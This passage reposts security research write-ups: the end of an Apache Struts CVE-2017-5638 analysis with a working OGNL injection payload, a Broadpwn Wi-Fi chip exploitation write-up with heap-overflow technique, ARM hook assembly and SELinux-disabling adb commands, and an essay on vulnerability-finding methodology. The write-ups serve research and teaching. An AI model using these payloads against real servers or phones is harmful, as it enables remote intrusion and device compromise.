filename="a%00${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}” Content-Type: text/html test -----------------------------1313189278108275512788994811-- Reproduction Response: HTTP/1.1 404 No result defined for action com.opensymphony.xwork2.ActionSupport and result input Set-Cookie: JSESSIONID=hu1m7hcdnixr1h14hn51vyzhy;Path=/struts2-showcase X-Struts-Exploit-Test: GDSTEST Content-Type: text/html;charset=ISO-8859-1 [..snip..] Logged Exception: 2017-03-24 15:21:29,729 WARN [qtp1168849885-26] multipart.JakartaMultiPartRequest (JakartaMultiPartRequest.java:82) - Unable to parse request org.apache.commons.fileupload.InvalidFileNameException: Invalid file name: a\0${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))} at org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:189) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:259) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processFileField(JakartaMultiPartRequest.java:105) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:96) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:67) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.(MultiPartRequestWrapper.java:86) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:806) [struts2-core-2.5.10.jar:2.5.10] As you can see by looking at the stacktrace, control flow diverges in the processUpload method of the JakartaMultiPartRequest class. Instead of an exception being thrown when calling the parseRequest method on line 91, an exception is thrown when calling the processFileField method and getting the name of a file item on line 105. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 90: protected void processUpload(HttpServletRequest request, String saveDir) throws FileUploadException, UnsupportedEncodingException { 91: for (FileItem item : parseRequest(request, saveDir)) { 92: LOG.debug("Found file item: [{}]", item.getFieldName()); 93: if (item.isFormField()) { 94: processNormalFormField(item, request.getCharacterEncoding()); 95: } else { 96: processFileField(item); 97: } 98: } 99: } [..snip..] 101: protected void processFileField(FileItem item) { 102: LOG.debug("Item is a file upload"); 103: 104: // Skip file uploads that don't have a file name - meaning that no file was selected. 105: if (item.getName() == null || item.getName().trim().length() < 1) { 106: LOG.debug("No file has been uploaded for the field: {}", item.getFieldName()); 107: return; 108: } 109: 110: List<FileItem> values; 111: if (files.get(item.getFieldName()) != null) { 112: values = files.get(item.getFieldName()); 113: } else { 114: values = new ArrayList<>(); 115: } 116: 117: values.add(item); 118: files.put(item.getFieldName(), values); 119: } Takeaways One takeaway I had from this research is that you can’t always rely on reading CVE descriptions to understand how a vulnerability works. The reason this vulnerability was ever possible was because the file upload interceptor attempted to resolve error messages using a potentially dangerous function that evaluates OGNL. The elimination of this possibility is what lead to a successful patching of this vulnerability. Therefore this is not a problem with the Jakarta request wrapper, as the CVE description implies, but with the file upload interceptor trusting that exception messages will be free of user input. Another takeaway I had reinforced the idea that you can’t rely on using known attack signatures to block exploitation at the web application firewall level. For example, if a web application firewall were configured to look for OGNL in the content-type header, it would miss the additional attack vector explained in this post. The only reliable way to eliminate vulnerabilities like this one is to apply available patches, either manually or by installing updates. Eric Rafaloff Sursa: https://blog.gdssecurity.com/labs/2017/3/27/an-analysis-of-cve-2017-5638.html
  6. Crashing phones with Wi-Fi: Exploiting nitayart's Broadpwn bug (CVE-2017-9417) This is part 2 of a two-part series on Broadpwn: part 1 is here: A cursory analysis of @nitayart's Broadpwn bug (CVE-2017-9417) TLDR: If you're near a malicious Wi-Fi network, an attacker can take over your Wi-Fi chip using @nitayart's Broadpwn bug, and then take over the rest of your phone with Project Zero/@laginimaineb's previously disclosed DMA attack. As a proof of concept, I've made a malicious network which uses these two exploits to corrupt the RAM of my Nexus 6P, causing a crash and reboot. Plan There's two parts to this proof of concept: A method to get arbitrary code execution on the Wi-Fi chip using @nitayart's Broadpwn bug An implementation of Project Zero's DMA engine hook to corrupt the kernel in the main system memory over PCIE The first part is very reliable - I can always get code execution; the second part only works sometimes, since we're pointing the Wi-Fi packet DMA into main memory, and so success depends on what packets are DMAed. Code execution on the Wi-Fi chip In the last post, we managed to cause a heap write out of bounds using the Broadpwn bug, which causes the Wi-Fi chip to crash when reading an invalid address. Here's the crashlog from the previous post: [ 695.399412] CONSOLE: FWID 01-a2412ac4 [ 695.399420] CONSOLE: flags 60040005 [ 695.399425] CONSOLE: 000003.645 [ 695.399430] CONSOLE: TRAP 4(23fc30): pc 5550c, lr 2f697, sp 23fc88, cpsr 2000019f, spsr 200001bf [ 695.399435] CONSOLE: 000003.645 dfsr 1, dfar 41414145 [ 695.399441] CONSOLE: 000003.645 r0 41414141, r1 2, r2 1, r3 0, r4 22cc00, r5 217634, r6 217048 [ 695.399449] CONSOLE: 000003.645 r7 2, r8 56, r9 1, r10 216120, r11 217224, r12 8848cb89 [ 695.399455] CONSOLE: 000003.645 [ 695.399460] CONSOLE: sp+0 00000002 0022cc00 0022d974 00217634 [ 695.399465] CONSOLE: 000003.645 sp+10 00000004 0001aa83 0022d97f 00000168 [ 695.399471] CONSOLE: [ 695.399476] CONSOLE: 000003.645 sp+14 0001aa83 [ 695.399481] CONSOLE: 000003.645 sp+38 000937eb [ 695.399486] CONSOLE: 000003.645 sp+44 00003b15 [ 695.399492] CONSOLE: 000003.645 sp+4c 00088659 [ 695.399497] CONSOLE: 000003.645 sp+64 00008fc7 [ 695.399502] CONSOLE: 000003.645 sp+74 0000379b [ 695.399507] CONSOLE: 000003.645 sp+94 00000a29 [ 695.399512] CONSOLE: 000003.645 sp+c4 0019a9e1 [ 695.399517] CONSOLE: 000003.645 sp+e4 00006a4d [ 695.399523] CONSOLE: 000003.645 sp+11c 00188113 [ 695.399528] CONSOLE: 000003.645 sp+15c 000852ef [ 695.399533] CONSOLE: 000003.645 sp+180 00019735 [ 695.399538] CONSOLE: 000003.645 sp+194 0001ec73 [ 695.399543] CONSOLE: 000003.645 sp+1bc 00018ba5 [ 695.399549] CONSOLE: 000003.645 sp+1dc 00018a75 [ 695.399554] CONSOLE: 000003.645 sp+1fc 0000656b First, let's figure out what exactly we're overwriting. According to Project Zero, heap allocations begin with a 8-byte header: a uint32_t containing the allocation's size and a pointer to the next free chunk if the current chunk is free or null if it's allocated. I connected to a normal Wi-Fi network that uses QoS, and dumped the Wi-Fi chip's RAM using dhdutil. Next, I used a modified version of Project Zero's heap visualization script to iterate through the entire heap, looking for allocations that begin with 0050f202 (the start of a WME information element). It turns out there's two allocations that both begin with this series of bytes: the chunk at 0x1f3550 and at 0x21700c. Both are followed by another chunk 0x78 bytes in size (at 0x1f3584 and 0x217040) Looking at the stack in the crashlog, we can see that r6=0x217048 matches the start of the second allocation, so the address we're overflowing seems to be the second one. Next, what are we overwriting afterwards? Right now, we only know the next chunk's size (0x78) and contents (a few pointers, no function pointers). Let's look at the code that crashed. Going up the call stack, we identified a function that contains a printf call with the function name. After cross referencing, we're able to reconstruct this call stack: 0x5550c wlc_hrt_del_timeout 0x635cc wlc_pm2_sleep_ret_timer_stop 0x2f670 wlc_set_pm_mode 0x19734 _wlc_ioctl So it looks like we overwrote a pointer to a timer, and the firmware crashes when disabling it. This type of timer is placed in a single linked list when enabled. A timer looks like this: typedef struct wlc_hrt_to { wlc_hrt_to_t *next; // 0x0 list_head *hrti; // 0x4 uint32_t timeout; // 0x8 void *func; // 0xc } wlc_hrt_to_t; So when disabling a timer, wlc_hrt_del_timeout performs the following: Check if the passed in pointer to the timer is null; if so, return Grab the pointer to the head of the list from the timer Iterate through the list until it finds the timer to disable Once it finds it, add the remaining time on the timer to the next timer in the sequence Perform standard singly-linked list unlink (prev->next = this->next) Finally set the function pointer on the timer to null So how can we turn this into a write primitive? Abuse the timeout addition! Make a fake timer object set the pointer to head of the list to a fake linked list head This fake linked list head points to the fake timer object Set the next pointer on this fake timer object to point to the code we want to overwrite Set the remaining time on this fake object to be (target value - current value at the address we want to overwrite) We also overlap the timer's function pointer with the link list head's next pointer And so, when the firmware attempts to disable this fake timer, it: Finds our timer object - it's the first timer in the fake linked list Adds the remaining time to the next timer in the list - which is pointing to the code we want to overwrite, giving us a write. Does the unlink by setting prev->next (which is the head of the list right now) to this->next And zeros out the function pointer. Since we overlapped the fake timer with the fake linked list head, this also zeroes the list head's ->next pointer, so any future attempts to disable this timer will fail gracefully when it sees an empty linked list, preventing crashes. I decided to use this to change the first instruction of dma64_txfast to a branch instruction that jumps into our overflowed buffer, allowing arbitrary code execution on the Wi-Fi chip. There's a few other things to take care of: setting the other pointers in the overwritten structure to null to prevent crashes when the firmware tries to access them filling the beginning of the overflowed structure with 0x41 to cause the firmware to disable the fake timer (For some reason, if I set it all to 0x00, the fake timer is never disabled. I don't know why.) making sure the firmware doesn't overwrite our payload (I made a payload with 0x41s, connected to the network, dumped the RAM to see which bytes were overwritten, and put code and structures into the intact areas) but after that, we have code execution! The payload can be seen here, with comments on the purpose of each part. Now, what to execute? Crashing the main CPU Let's implement Project Zero's DMA attack. The TLDR of their approach is that recent phones connect Wi-Fi chipsets via PCI Express, which allows arbitrary memory writes and reads through DMA. By manipulating the list of DMA buffers on the Wi-Fi chip, an attacker can write any information into main memory, thus getting code execution on the main CPU. I'm using Project Zero's first DMA attack, which simply sets the D2H_MSGRING_TX_COMPLETE ring's ringaddr to point into the kernel. I dumped the address of the ring structure using Project Zero's dump_pci.py script, and then wrote a hook that patches the target address to 0x248488 in the main CPU's physical memory (which seems to correspond to critical code in the kernel I'm running), and also patches out the WME IE bug that we exploited in the first place (so that we don't accidentally run the exploit twice). Here's the hook: .syntax unified .thumb hook_entry: // 0x90 push {r0-r3,r4-r9,lr} // 0x217090 bl fullhook // 0x217094 pop {r0-r3} // 0x217098 .word 0xbaf9f774 // 0x21709a: branch to original txfast fullhook: ldr r3, patchoutaddr // 0x21709e ldr r2, patchaddr // 0x2170a0 str r2, [r3] // 0x2180a2 ldr r2, ringaddr // 0x2180a4 ldr r3, valuewritten // 0x2180a6 str r3, [r2] // 0x2180a8 bx lr // 0x2180aa valuewritten: .word 0x00248488 // 0x2180ac physical address on the host side; seems to crash things... patchoutaddr: .word 0x1b8ad0 // 0x2180b0 function to patch patchaddr: .word 0x47702000 // 0x2180b4 mov r0, #0; bx lr note firmware overwrites byte 0 with a 0; it's fine ringaddr: .word 0x002397C4 // 0x2180b8 ringaddr of D2H_MSGRING_TX_COMPLETE dumped with Project Zero's dump_pci.py This is then assembled and placed into the payload. The next time dma64_txfast is called, our code will patch the DMA ring, and the next Wi-Fi packet to be processed will overwrite part of the main CPU's kernel, crashing it. The final payload can be seen here, along with other useful scripts. Result Experimental setup: computer same as before (Ubuntu 14.04, hostapd 2.6, Intel 7260 integrated Wi-Fi). Phone same as before: Google/Huawei Nexus 6P: running the latest firmware (N2G48B), but modified with the vulnerable June Broadcom firmware for testing this bug, and with a custom kernel for rooting. Since the bug is in the Wi-Fi firmware only, this should give the same result as an unupdated stock Nexus 6P. When the device connects to the network, it froze, and then after a few seconds it rebooted. The console-ramoops file (which contains the kernel log from the previous boot) shows a kernel panic from an invalid instruction exception in the kernel. (I tried to overwrite sys_nanosleep, but missed. It seemed to break something at least.) The crash isn't very reliable (the code exec on the wi-fi chip seems to be reliable, but getting the PCIE DMA to cooperate isn't.) When it works, the crash log shows this: [ 5887.413947] CFG80211-ERROR) wl_cfg80211_connect : Connecting to (MAC address) with channel (1) ssid (Network) [ 5887.420050] CFG80211-ERROR) wl_notify_connect_status : connect failed event=0 e->status 4 e->reason 1 [ 5887.426601] CFG80211-ERROR) wl_bss_connect_done : Report connect result - connection failed [ 5887.474993] WLDEV-ERROR) wldev_set_country : wldev_set_country: set country for CA as US rev 975 [ 5887.596971] type=1400 audit(1499840123.620:282): avc: denied { syslog_read } for pid=14628 comm="WifiStateMachin" scontext=u:r:system_server:s0 tcontext=u: r:kernel:s0 tclass=system permissive=1 [ 5887.642896] dhd_dbg_monitor_get_tx_pkts(): no tx_status in tx completion messages, make sure that 'd11status' is enabled in firmware, status_pos=0 [ 5887.810772] HTB: quantum of class 10001 is big. Consider r2q change. [ 5887.829826] HTB: quantum of class 10010 is big. Consider r2q change. [ 5889.614299] Internal error: Oops - undefined instruction: 0 [#1] PREEMPT SMP [ 5889.614322] CPU: 0 PID: 23518 Comm: kworker/0:1 Tainted: G W 3.10.73-g4f6d61a-00391-gde1f200-dirty #38 [ 5889.614339] Workqueue: events rslow_comp_work [ 5889.614350] task: ffffffc0812d8ac0 ti: ffffffc08d134000 task.ti: ffffffc08d134000 [ 5889.614358] PC is at fg_mem_write+0x3f0/0x4dc [ 5889.614364] LR is at fg_mem_write+0x3f0/0x4dc [ 5889.614370] pc : [<ffffffc0008b8480>] lr : [<ffffffc0008b8480>] pstate: 60000145 [ 5889.614374] sp : ffffffc08d137b80 [ 5889.614379] x29: ffffffc08d137b80 x28: ffffffc0bec2f2c8 [ 5889.614388] x27: ffffffc08d137bfe x26: ffffffc08d137c0f [ 5889.614396] x25: ffffffc08d137c10 x24: 0000000000000000 [ 5889.614405] x23: ffffffc08d137cc4 x22: 0000000000000000 [ 5889.614413] x21: 0000000000000004 x20: 0000000000000001 [ 5889.614421] x19: ffffffc0bec2f018 x18: 0000000000000000 [ 5889.614429] x17: 0000000000000000 x16: ffffffc00034f1bc [ 5889.614438] x15: 0000000000000000 x14: 0ffffffffffffffe [ 5889.614446] x13: 0000000000000030 x12: 0101010101010101 [ 5889.614454] x11: 7f7f7f7f7f7f7f7f x10: 0000000000004410 [ 5889.614462] x9 : ffffffc006158018 x8 : ffffffc00168e300 [ 5889.614471] x7 : 0000000000000818 x6 : 0000000000000000 [ 5889.614479] x5 : 0000000000000818 x4 : 00000000fc4cf000 [ 5889.614487] x3 : 0000000000000001 x2 : 09104ccfa95a13c2 [ 5889.614495] x1 : 09104ccfa95a13c2 x0 : 0000000000000000 (snip a few lines) [ 5889.615088] Process kworker/0:1 (pid: 23518, stack limit = 0xffffffc08d134058) [ 5889.615093] Call trace: [ 5889.615100] [<ffffffc0008b8480>] fg_mem_write+0x3f0/0x4dc [ 5889.615106] [<ffffffc0008b8a38>] fg_mem_masked_write+0x114/0x178 [ 5889.615113] [<ffffffc0008ba598>] rslow_comp_work+0x238/0x364 [ 5889.615123] [<ffffffc00023d224>] process_one_work+0x25c/0x3c0 [ 5889.615129] [<ffffffc00023d580>] worker_thread+0x1f8/0x348 [ 5889.615139] [<ffffffc000243e70>] kthread+0xc0/0xcc [ 5889.615147] Code: f9400660 52800023 11004042 97fff7bc (000103e2) [ 5889.615153] ---[ end trace 48638eec16f50d72 ]--- [ 5889.628687] Kernel panic - not syncing: Fatal exception [ 5889.628851] CPU1: stopping Impact Yep, we've proved Broadpwn to be exploitable. In addition, the heap buffers that are overflowed are allocated at startup, so they are stable for a given firmware version and chip. So if attackers knows your device and your firmware version, they can take over the Wi-Fi chip and then the whole phone. I think @Viss has the best advice: just turn Wi-Fi off. Stuff I don't know how to do There's a few issues that prevents this proof-of-concept from being useful. Project Zero's proof of concept, implemented here, DMAs random network packets into main memory; I was unable to implement their more advanced dma64_txfast hook (which gives more control over the address to write. It worked once, and only once, and I can't reproduce it.) can we control what's written so that we can modify the kernel instead of just corrupting and crashing it? Currently, the Wi-Fi stops working if I trigger the bug, even if I use a payload that doesn't crash the device or the Wi-Fi chip. It just fails to finish connecting to network. An attacker will need to keep the Wi-Fi working to avoid user suspicion and to exfiltrate data. Current payload requires address of buffer that's overflowed + address of dma64_txfast, both of which differs between phones and firmware versions. Is it possible to develop an exploit that works on all devices? @nitayart's Black Hat presentation is likely to cover some of these, so don't miss it. Appendix: testing with a different version of firmware I have my phone updated to the latest version of Android, so when I need to test this bug, I need to downgrade the Broadcom firmware. Here's how: $ adb shell # setenforce 0 # cp fw_bcmdhd.bin /data/local/tmp/firmware/ # chmod 755 /data/local/tmp/firmware/fw_bcmdhd.bin # mount -o bind /data/local/tmp/firmware /vendor/firmware # stop # start Sursa: http://boosterok.com/blog/broadpwn2/
      • 3
      • Upvote
  7. High-Level Approaches for Finding Vulnerabilities Fri 15 September 2017 This post is about the approaches I've learned for finding vulnerabilities in applications (i.e. software security bugs, not misconfigurations or patch management issues). I'm writing this because it's something I wish I had when I started. Although this is intended for beginners and isn't new knowledge, I think more experienced analysts might gain from comparing this approach to their own just like I have gained from others like Brian Chess and Jacob West, Gynvael Coldwind, Malware Unicorn, LiveOverflow, and many more. Keep in mind that this is a work-in-progress. It's not supposed to be comprehensive or authoritative, and it's limited by the knowledge and experience I have in this area. I've split it up into a few sections. I'll first go over what I think the discovery process is at a high level, and then discuss what I would need to know and perform when looking for security bugs. Finally, I'll discuss some other thoughts and non-technical lessons learned that don't fit as neatly in the earlier sections. What is the vulnerability discovery process? In some ways, the vulnerability discovery process can be likened to solving puzzles like mazes, jigsaws, or logic grids. One way to think about it abstractly is to see the process as a special kind of maze where: You don't immediately have a birds-eye view of what it looks like. A map of it is gradually formed over time through exploration. You have multiple starting points and end points but aren't sure exactly where they are at first. The final map will almost never be 100% clear, but sufficient to figure out how to get from point A to B. If we think about it less abstractly, the process boils down to three steps: Enumerate entry points (i.e. ways of interacting with the app). Think about insecure states (i.e. vulnerabilities) that an adversary would like to manifest. Manipulate the app using the identified entry points to reach the insecure states. In the context of this process, the maze is the application you're researching, the map is your mental understanding of it, the starting points are your entry points, and the end points are your insecure states. Entry points can range from visibly modifiable parameters in the UI to interactions that are more obscure or transparent to the end-user (e.g. IPC). Some of the types of entry points that are more interesting to an adversary or security researcher are: Areas of code that are older and haven't changed much over time (e.g. vestiges of transition from legacy). Intersections of development efforts by segmented teams or individuals (e.g. interoperability). Debugging or test code that is carried forward into production from the development branch. Gaps between APIs invoked by the client vs. those exposed by the server. Internal requests that are not intended to be influenced directly by end-users (e.g. IPC vs form fields). The types of vulnerabilities I think about surfacing can be split into two categories: generic and contextual. Generic vulnerabilities (e.g. RCE, SQLi, XSS, etc.) can be sought across many applications often without knowing much of their business logic, whereas contextual vulnerabilities (e.g. unauthorized asset exposure/tampering) require more knowledge of business logic, trust levels, and trust boundaries. The rule of thumb I use when prioritizing what to look for is to first focus on what would yield the most impact (i.e. highest reward to an adversary and the most damage to the application's stakeholders). Lightweight threat models like STRIDE can also be helpful in figuring out what can go wrong. Let's take a look at an example web application and then an example desktop application. Let's say this web application is a single-page application (SPA) for a financial portal and we have authenticated access to it, but no server-side source code or binaries. When we are enumerating entry points, we can explore the different features of the site to understand their purpose, see what requests are made in our HTTP proxy, and bring some clarity to our mental map. We can also look at the client-side JavaScript to get a list of the RESTful APIs called by the SPA. A limitation of not having server-side code is that we can't see the gaps between the APIs called by the SPA and those that are exposed by the server. The identified entry points can then be manipulated in an attempt to reach the insecure states we're looking for. When we're thinking of what vulnerabilities to surface, we should be building a list of test-cases that are appropriate to the application's technology stack and business logic. If not, we waste time trying test cases that will never work (e.g. trying xp_cmdshell when the back-end uses Postgres) at the expense of not trying test cases that require a deeper understanding of the app (e.g. finding validation gaps in currency parameters of Forex requests). With desktop applications, the same fundamental process of surfacing vulnerabilities through identified entry points still apply but there are a few differences. Arguably the biggest difference with web applications is that it requires a different set of subject-matter knowledge and methodology for execution. The OWASP Top 10 won't help as much and hooking up the app to an HTTP proxy to inspect network traffic may not yield the same level of productivity. This is because the entry points are more diverse with the inclusion of local vectors. Compared to black-box testing, there is less guesswork involved when you have access to source code. There is less guesswork in finding entry points and less guesswork in figuring out vulnerable code paths and exploitation payloads. Instead of sending payloads through an entry point that may or may not lead to a hypothesized insecure state, you can start from a vulnerable sink and work backwards until an entry point is reached. In a white-box scenario, you become constrained more by the limitations of what you know over the limitations of what you have. What knowledge is required? So why are we successful? We put the time in to know that network. We put the time in to know it better than the people who designed it and the people who are securing it. And that's the bottom line. — Rob Joyce, TAO Chief The knowledge required for vulnerability research is extensive, changes over time, and can vary depending on the type of application. The domains of knowledge, however, tend to remain the same and can be divided into four: Application Technologies. This embodies the technologies a developer should know to build the target application, including programming languages, system internals, design paradigms/patterns, protocols, frameworks/libraries, and so on. A researcher who has experience programming with the technologies appropriate to their target will usually be more productive and innovative than someone who has a shallow understanding of just the security concerns associated with them. Offensive and Defensive Concepts. These range from foundational security principles to constantly evolving vulnerability classes and mitigations. The combination of offensive and defensive concepts guide researchers toward surfacing vulnerabilities while being able to circumvent exploit mitigations. A solid understanding of application technologies and defensive concepts is what leads to remediation recommendations that are non-generic and actionable. Tools and Methodologies. This is about effectively and efficiently putting concepts into practice. It comes through experience from spending time learning how to use tools and configuring them, optimizing repetitive tasks, and establishing your own workflow. Learning how relevant tools work, how to develop them, and re-purpose them for different use cases is just as important as knowing how to use them. A process-oriented methodology is more valuable than a tool-oriented methodology. A researcher shouldn't stop pursuing a lead when a limitation of a tool they're using has been reached. The bulk of my methodology development has come from reading books and write-ups, hands-on practice, and learning from many mistakes. Courses are usually a good way to get an introduction to topics from experts who know the subject-matter well, but usually aren't a replacement for the experience gained from hands-on efforts. Target Application. Lastly, it's important to be able to understand the security-oriented aspects of an application better than its developers and maintainers. This is about more than looking at what security-oriented features the application has. This involves getting context about its use cases, enumerating all entry points, and being able to hypothesize vulnerabilities that are appropriate to its business logic and technology stack. The next section details the activities I perform to build knowledge in this area. The table below illustrates an example of what the required knowledge may look like for researching vulnerabilities in web applications and Windows desktop applications. Keep in mind that the entries in each category are just for illustration purposes and aren't intended to be exhaustive. Web Applications Desktop Applications Application Technologies Offensive and Defensive Concepts Tools and Methodologies Target Application Thousands of hours, hundreds of mistakes, and countless sleepless nights go into building these domains of knowledge. It's the active combination and growth of these domains that helps increase the likelihood of finding vulnerabilities. If this section is characterized by what should be known, then the next section is characterized by what should be done. What activities are performed? When analyzing an application, I use the four "modes of analysis" below and constantly switch from one mode to another whenever I hit a mental block. It's not quite a linear or cyclical process. I'm not sure if this model is exhaustive, but it does help me stay on track with coverage. Within each mode are active and passive activities. Active activities require some level of interaction with the application or its environment whereas passive activities do not. That said, the delineation is not always clear. The objective for each activity is to: Understand assumptions made about security. Hypothesize how to undermine them. Attempt to undermine them. Use case analysis is about understanding what the application does and what purpose it serves. It's usually the first thing I do when tasked with a new application. Interacting with a working version of the application along with reading some high-level documentation helps solidify my understanding of its features and expected boundaries. This helps me come up with test cases faster. If I have the opportunity to request internal documentation (threat models, developer documentation, etc.), I always try to do so in order to get a more thorough understanding. This might not be as fun as doing a deep-dive and trying test cases, but it's saved me a lot of time overall. An example I can talk about is with Oracle Opera where, by reading the user-manual, I was able to quickly find out which database tables stored valuable encrypted data (versus going through them one-by-one). Implementation analysis is about understanding the environment within which the application resides. This may involve reviewing network and host configurations at a passive level, and performing port or vulnerability scans at an active level. An example of this could be a system service that is installed where the executable has an ACL that allows low-privileged users to modify it (thereby leading to local privilege escalation). Another example could be a web application that has an exposed anonymous FTP server on the same host which could lead to exposure of source code and other sensitive files. These issues are not inherent to the applications themselves, but how they have been implemented in their environments. Communications analysis is about understanding what and how the target exchanges information with other processes and systems. Vulnerabilities can be found by monitoring or actively sending crafted requests through different entry points and checking if the responses yield insecure states. Many web application vulnerabilities are found this way. Network and data flow diagrams, if available, are very helpful in seeing the bigger picture. While an understanding of application-specific communication protocols is required for this mode, an understanding of the application's internal workings are not. How user-influenced data is being passed and transformed within a system is more or less seen as a black-box in this analysis mode, with the focus on monitoring and sending requests and analyzing the responses that come out. If we go back to our hypothetical financial portal from earlier, we may want to look at the feature that allows clients to purchase prepaid credit cards in different currencies as a contrived example. Let's assume that a purchase request accepts the following parameters: fromAccount: The account from which money is being withdrawn to purchase the prepaid card. fromAmount: The amount of money to place into the card in the currency of fromAccount (e.g. 100). cardType: The type of card to purchase (e.g. USD, GBP). currencyPair: The currency pair for fromAccount and cardType (e.g. CADUSD, CADGBP). The first thing we might want to do is send a standard request so that we know what a normal response should look like as a baseline. A request and response to purchase an $82 USD card from a CAD account might look like this: Request Response { "fromAccount": "000123456", "fromAmount": 100, "cardType": "USD", "currencyPair": "CADUSD" } { "status": "ok", "cardPan": 4444333322221111, "cardType": "USD" "toAmount": 82.20, } We may not know exactly what happened behind the scenes, but it came out ok as indicated by the status attribute. Now if we tweak the fromAmount to something negative, or the fromAccount to someone else's account, those may return erroneous responses indicating that validation is being performed. If we change the value of currencyPair from CADUSD to CADJPY, we'll see that the toAmount changes from 82.20 to 8863.68 while the cardType is still USD. We're able to get more bang for our buck by using a more favourable exchange rate while the desired card type stays the same. If we have access to back-end code, it would make it easier to know what's happening to that user input and come up with more thorough test cases that could lead to insecure states with greater precision. Perhaps an additional request parameter that's not exposed on the client-side could have altered the expected behaviour in a potentially malicious way. Code and binary analysis is about understanding how user-influenced input is passed and transformed within a target application. To borrow an analogy from Practical Malware Analysis, if the last three analysis modes can be compared to looking at the outside of a body during an autopsy, then this mode is where the dissection begins. There are a variety of activities that can be performed for static and dynamic analysis. Here are a few: Data flow analysis. This is useful for scouting entry points and understanding how data can flow toward potential insecure states. When I'm stuck trying to get a payload to work in the context of communications analysis, I tweak it in different ways to try get toward that hypothesized insecure state. In comparison with this mode, I can first look into checking whether that insecure state actually exists, and if so, figure out how to craft my payload to get there with greater precision. As mentioned earlier, one of the benefits of this mode is being able to find insecure states and being able to work backwards to craft payloads for corresponding entry points. Static and dynamic analysis go hand-in-hand here. If you're looking to go from point A to B, then static analysis is like reading a map, and dynamic analysis is like getting a live overview of traffic and weather conditions. The wide and abstract understanding of an application you get from static analysis is complemented by the more narrow and concrete understanding you get from dynamic analysis. Imports analysis. Analyzing imported APIs can give insight into how the application functions and how it interacts with the OS, especially in the absence of greater context. For example, the use of cryptographic functions can indicate that some asset is being protected. You can trace calls to figure out what it's protecting and whether it's protected properly. If a process is being created, you can look into determining whether user-input can influence that. Understanding how the software interacts with the OS can give insight on entry points you can use to interact with it (e.g. network listeners, writable files, IOCTL requests). Strings analysis. As with analyzing imports, strings can give some insights into the program's capabilities. I tend to look for things like debug statements, keys/tokens, and anything that looks suspicious in the sense that it doesn't fit with how I would expect the program to function. Interesting strings can be traced for its usages and to see if there are code paths reachable from entry points. It's important to differentiate between strings that are part of the core program and those that are included as part of statically-imported libraries. Security scan triage. Automated source code scanning tools may be helpful in finding generic low-hanging fruit, but virtually useless at finding contextual or design-based vulnerabilities. I don't typically find this to be the most productive use of my time because of the sheer number of false positives, but if it yields many confirmed vulnerabilities then it could indicate a bigger picture of poor secure coding practices. Dependency analysis. This involves triaging dependencies (e.g. open-source components) for known vulnerabilities that are exploitable, or finding publicly unknown vulnerabilities that could be leveraged within the context of the target application. A modern large application is often built on many external dependencies. A subset of them can have vulnerabilities, and a subset of those vulnerabilities can "bubble-up" to the main application and become exploitable through an entry point. Common examples include Heartbleed, Shellshock, and various Java deserialization vulnerabilities. Repository analysis. If you have access to a code repository, it may help identify areas that would typically be interesting to researchers. Aside from the benefits of having more context than with a binary alone, it becomes easier to find older areas of code that haven't changed in a long time and areas of code that bridge the development efforts of segmented groups. Code and binary analysis typically takes longer than the other modes and is arguably more difficult because researchers often need to understand the application and its technologies to nearly the same degree as its developers. In practice, this knowledge can often be distributed among segmented groups of developers while researchers need to understand it holistically to be effective. I cannot overstate how important it is to have competency in programming for this. A researcher who can program with the technologies of their target application is almost always better equipped to provide more value. On the offensive side, finding vulnerabilities becomes more intuitive and it becomes easier to adapt exploits to multiple environments. On the defensive side, non-generic remediation recommendations can be provided that target the root cause of the vulnerability at the code level. Similar to the domains of knowledge, actively combining this analysis mode with the others helps makes things click and increases the likelihood of finding vulnerabilities. Other Thoughts and Lessons Learned This section goes over some other thoughts worth mentioning that didn't easily fit in previous sections. Vulnerability Complexity Vulnerabilities vary in a spectrum of complexity. On one end, there are trivial vulnerabilities which have intuitive exploit code used in areas that are highly prone to scrutiny (e.g. the classic SQLi authentication bypass). On the other end are the results of unanticipated interactions between system elements that by themselves are neither insecure nor badly engineered, but lead to a vulnerability when chained together (e.g. Chris Domas' "Memory Sinkhole"). I tend to distinguish between these ends of the spectrum with the respective categories of "first-order vulnerabilities" and "second-order vulnerabilities", but there could be different ways to describe them. The modern exploit is not a single shot vulnerability anymore. They tend to be a chain of vulnerabilities that add up to a full-system compromise. — Ben Hawkes, Project Zero Working in Teams It is usually helpful to be upfront to your team about what you know and don't know so that you can (ideally) be delegated tasks in your areas of expertise while being given opportunities to grow in areas of improvement. Pretending and being vague is counterproductive because people who know better will sniff it out easily. If being honest can become political, then maybe it's not an ideal team to work with. On the other hand, you shouldn't expect to be spoon-fed everything you need to know. Learning how to learn on your own can help you become self-reliant and help your team's productivity. If you and your team operate on billable time, the time one takes to teach you might be time they won't get back to focus on their task. The composition of a team in a timed project can be a determining factor to the quantity and quality of vulnerabilities found. Depending on the scale and duration of the project, having more analysts could lead to faster results or lead to extra overhead and be counterproductive. A defining characteristic of some of the best project teams I've been on is that in addition to having good rapport and communication, we had diverse skill sets that played off each other which enhanced our individual capabilities. We also delegated parallelizable 